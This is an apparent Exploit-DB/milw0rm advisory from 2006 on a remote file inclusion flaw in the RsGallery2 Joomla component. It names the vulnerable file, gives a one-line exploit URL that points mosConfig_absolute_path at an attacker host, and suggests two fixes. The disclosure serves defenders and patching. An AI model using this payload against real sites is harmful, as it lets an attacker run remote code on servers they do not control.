RsGallery2 < 1.11.2 - 'rsgallery.html.php' File Inclusion

EDB-ID:

1959




Platform:

PHP

Date:

2006-06-28


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

RsGallery2 for Joomla
---------------------------------------------------------------------------

Discovered: marriottvn
Remote : Yes
Level : High

---------------------------------------------------------------------------
Affected software description :

Application : RsGallery2
version : latest version [ 1.11.2 ]
Description: component for joomla
URL: http://rsdev.nl

----------------------------------------------------------------------------

Vulnerable file :

rsgallery2.html.php

----------------------------------------------------------------------------

Exploit:

http://[sitepath]/[joomlapath]/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://[attacker]

----------------------------------------------------------------------------

Fix:

1.Declare variabel $mosConfig_absolute_path

or

2.Add into the top function:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

----------------------------------------------------------------------------

Contact:

Nick: marriottvn
E-mail: i_love_lonely_girl[at]yahoo.com
Web: http://vnsecurity.com

Greetz to: VnRekcah

# milw0rm.com [2006-06-28]